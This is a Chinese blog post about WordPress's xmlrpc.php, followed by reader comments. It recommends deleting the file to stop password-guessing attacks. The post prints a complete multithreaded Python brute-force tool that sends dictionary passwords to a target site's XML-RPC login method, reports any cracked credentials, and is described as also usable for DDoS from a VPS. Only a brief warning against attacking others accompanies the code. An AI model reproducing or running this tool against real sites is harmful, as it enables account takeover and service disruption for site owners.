当前位置:首页 > WordPress > 正文

关于WordPress密码暴力破解、XML-RPC协议的一些事

最近很少管博客,今天无聊到一个倒霉的孩纸那里看了一下,发现一篇关于XML-RPC协议安全的文章。虽然他是被DDOS攻击的,和XML-RPC应该没有什么关系,不过他还是果断关掉了,那个功能。(该被DDOS还是会继续的)

不过所谓XML-RPC带来的安全隐患,应该要从他的功能方面说起,一般博客程序都会有一个API接口,也就是xmlrpc.php文件,它可以使用POST进行登陆,发布文章……等等等等,很多的功能,也就是个网站管理的支持,之所以会有安全隐患,会被攻击,我想这个唯一的功能,应该就是进行密码猜想了吧!

密码猜想就是通过批量发起密码登录,被攻击?如果这不是的话,他所带来的副作用,应该就是多线程测试惹的祸吧,速度过快,还可以兼顾DDOS的功能,所以说“被攻击了”主要目标应该还是来获取你的帐号密码吧!

其实XML就是个格式和json没什么两样,同样也是接口文件的输出,都差不多。

但是一般来说,直接用wordpress的孩纸们,要这个接口又有什么卵用,好像是没有~除非你用WordPress客户端!

不过我看了一下他的方法,自我感觉太烦了还影响效率!尤其是他的第三种,对于密码猜想好像没有什么卵用!

小幻给出一个最直接的方法,直接修改or删掉xmlrpc.php文件,让他不存在,世界就安静了!

直接提示404错误,对方应该就不会持续太久了,要是用过滤器的话,对方可不知道!还是会继续的,,导致变相DDOS攻击开始了!

最后科普一下wordpress密码暴力猜想的源码 (多线程)放到VPS上运行就够了(同时还可以达到DDOS的效果)

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_8 -*-
import os, sys, time, urllib2
import threading, Queue
def usage():
 os.system(['clear', 'cls'][os.name == 'nt'])
 print '+' + '-' * 50 + '+'
 print '\t Python WordPress暴力破解工具多线程版'
 print '\t   Blog:http://ihuan.me/'
 print '+' + '-' * 50 + '+'
 if len(sys.argv) != 4:
   print '用法: ' + os.path.basename(sys.argv[0]) + '  用户名  密码字典  待破解的网站URL地址  '
   print '实例: ' + os.path.basename(sys.argv[0]) + '  admin  pass.txt http://ihuan.me/ '
   sys.exit()
queue = Queue.Queue()
lock = threading.RLock()
success = []
class Crack(threading.Thread):
 '''
 WordPress xmlrpc多线程暴力破解类
 '''
 def __init__(self, queue):
   super(Crack, self).__init__()
   self.queue = queue
   self.crack_url = url + 'xmlrpc.php'
 def run(self):
   while True:
     try:
       password = self.queue.get()
       if password == None: break
       self.post = '''
         <?xml version="1.0" encoding="iso-8859-1"?>
         <methodCall>
           <methodName>wp.getUsersBlogs</methodName>
           <params>
            <param><value>''' + username + '''</value></param>
            <param><value>''' + password + '''</value></param>
           </params>
         </methodCall>
       '''
       self.header = {
         'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
         'Referer': self.crack_url
       }
       self.req = urllib2.Request(self.crack_url, data=self.post, headers=self.header)
       self.res = urllib2.urlopen(self.req, timeout=10).read().decode('utf-8').encode('GBK')
     except Exception, msg:
       lock.acquire()
       print '发生了异常情况!', msg
       lock.release()
     else:
       lock.acquire()
       if 'faultCode' in self.res:
         print '[×] 正在尝试密码: %s' % password
       elif 'isAdmin' in self.res:
         print '\n[√] 密码破解成功: %s\n' % password
         success.append(password)
       lock.release()
     finally:
       self.queue.task_done()
if __name__ == '__main__':
 usage()
 username = sys.argv[1]
 url = sys.argv[3]
 if url[-1] != '/': url += '/'
 print '[√] 目标:', url + '\n'
 start = time.time()
 if os.path.isfile(sys.argv[2]):
   passlist = [x.strip() for x in open(sys.argv[2])]
   print '[√] 共有密码[ %d ]行!\n' % len(passlist)
   for i in range(10):
     t = Crack(queue)
     t.setDaemon(True)
     t.start()
   for password in passlist:
     queue.put(password)
   queue.join()
   if success:
     print '\n[√] 密码破解成功!'
     print '\n[√] 用户名: %s,密码:%s' % (username, success[0])
   else:
     print '\n[!] 没有找到密码,请更换字典!'
   print '\n[!] 破解完毕,用时:%s 秒' % (time.time() - start)
 else:
   print '没有密码字典'

其实就是通过发出请求,然后解析返回的XML文件,判断。然后就成了一个安全隐患咯!

其实无聊的小学生不多,除非你和他有仇!( •̀ ω •́ )不要以我为目标,小站攻击,分分钟挂掉!

最后,加上被攻击孩纸的 相关文章

http://www.loverobots.cn/make-your-wordpress-more-secure-xml-rpc-publishing-control-plugin.html

好了,就这些,再次潜水……不要无聊对他人站点进行攻击,这样损人不利己的事情,请最好不要玩哟!

标签:
上一篇: 下一篇:

17 条评论

评论加载中...
  1. 12楼
    来自天朝的朋友 Safari浏览器  Android 4.2.2 X909T Build/JDQ39
    南国掌柜  

    看来那个文件是该删了……

    2015年9月13日 22:28 评论
  2. 11楼
    来自天朝的朋友 QQ浏览器 Windows 10
    Mickey  

    短时间内多次访问扔小黑屋拒绝请求呢

    2015年7月12日 08:05 评论
    • 幻殺あ殤璃  

      话说,把自己丢小黑屋,什么感觉

      2015年7月12日 09:37 评论
      • Mickey  

        跟我刚刚服务器宕机的感觉应该差不多_(:з」∠)_

        2015年7月12日 10:54 评论
        • 幻殺あ殤璃  

          就是作死的感觉

          2015年7月12日 11:47 评论

发表评论

不理你。不要啊!吃饭。吃惊。吃西瓜。飞吻!恭喜!Hi纠结!膜拜!OK抛媚眼。泡泡糖。抛钱。忍!生闷气!调皮。偷看。委屈。献花。疑问?抓狂!

小提示:Ctrl+Enter快速提交助您一臂之力~
加载中……